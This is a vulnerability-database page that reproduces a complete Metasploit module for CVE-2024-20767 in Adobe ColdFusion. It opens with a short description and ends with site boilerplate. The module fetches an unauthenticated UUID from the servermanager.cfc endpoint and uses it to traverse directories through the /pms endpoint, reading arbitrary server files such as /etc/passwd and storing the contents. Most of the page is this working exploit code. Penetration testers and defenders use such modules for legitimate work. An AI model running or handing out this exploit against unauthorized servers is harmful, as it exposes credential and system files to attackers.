Lucene search
K

CVE-2024-20767 - Adobe Coldfusion Arbitrary File Read

🗓️ 03 May 2024 19:55:42Reported by ma4ter, yoryio, Christiaan Beek, jheysel-r7Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 288 Views

This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version '2023 Update 6' and '2021 Update 12'. The vulnerability allows unauthenticated attackers to request authentication token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CVE-2024-20767 - Adobe Coldfusion Arbitrary File Read',
        'Description' => %q{
          This module exploits an Improper Access Vulnerability in Adobe Coldfusion versions prior to version
          '2023 Update 6' and '2021 Update 12'. The vulnerability allows unauthenticated attackers to request authentication
          token in the form of a UUID from the /CFIDE/adminapi/_servermanager/servermanager.cfc endpoint. Using that
          UUID attackers can hit the /pms endpoint in order to exploit the Arbitrary File Read Vulnerability.
        },
        'Author' => [
          'ma4ter',          # Analysis & Discovery
          'yoryio',          # PoC
          'Christiaan Beek', # Msf module
          'jheysel-r7'       # Msf module assistance
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-20767'],
          ['EDB', '52387'],
          ['URL', 'https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html'],
          ['URL', 'https://jeva.cc/2973.html'],

        ],
        'DisclosureDate' => '2024-03-12',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(8500),
        OptString.new('TARGETURI', [true, 'The base path for ColdFusion', '/']),
        OptString.new('FILE_PATH', [true, 'File path to read from the server', '/etc/passwd']),
        OptInt.new('NUMBER_OF_LINES', [true, 'Number of lines to retrieve', 10000]),
        OptInt.new('DEPTH', [true, 'Traversal Depth', 5]),
      ]
    )
  end

  def get_uuid
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', '_servermanager', 'servermanager.cfc'),
      'vars_get' =>
       {
         'method' => 'getHeartBeat'
       }
    })
    fail_with(Failure::Unreachable, 'No response from the target when attempting to retrieve the UUID') unless res

    # TODO: give a more detailed error message once we find out why some of the seemingly vulnerable test targets return a 500 here.
    fail_with(Failure::UnexpectedReply, "Received an unexpected response code: #{res.code} when attempting to retrieve the UUID") unless res.code == 200
    uuid = res.get_html_document.xpath('//var[@name=\'uuid\']/string/text()').text
    fail_with(Failure::UnexpectedReply, 'There was no UUID in the response') unless uuid =~ /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/
    uuid
  end

  def run
    print_status('Attempting to retrieve UUID ...')
    uuid = get_uuid
    print_good("UUID found: #{uuid}")
    print_status("Attempting to exploit directory traversal to read #{datastore['FILE_PATH']}")

    traversal_path = '../' * datastore['DEPTH']
    file_path = "#{traversal_path}#{datastore['FILE_PATH']}"

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'pms'),
      'vars_get' =>
         {
           'module' => 'logging',
           'file_name' => file_path,
           'number_of_lines' => datastore['NUMBER_OF_LINES']
         },
      'headers' =>
         {
           'uuid' => uuid
         }
    })

    fail_with(Failure::Unknown, 'No response received') unless res

    if res.code == 200
      print_good('File content received:')
    else
      fail_with(Failure::UnexpectedReply, "Failed to retrieve file content, server responded with status code: #{res.code}")
    end

    file_contents = []
    res.body[1..-2].split(', ').each do |html_response_line|
      print_status(html_response_line)
      file_contents << html_response_line
    end

    stored_path = store_loot('coldfusion.file', 'text/plain', rhost, file_contents.join("\n"), datastore['FILE_PATH'])
    print_good("Results saved to: #{stored_path}")
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation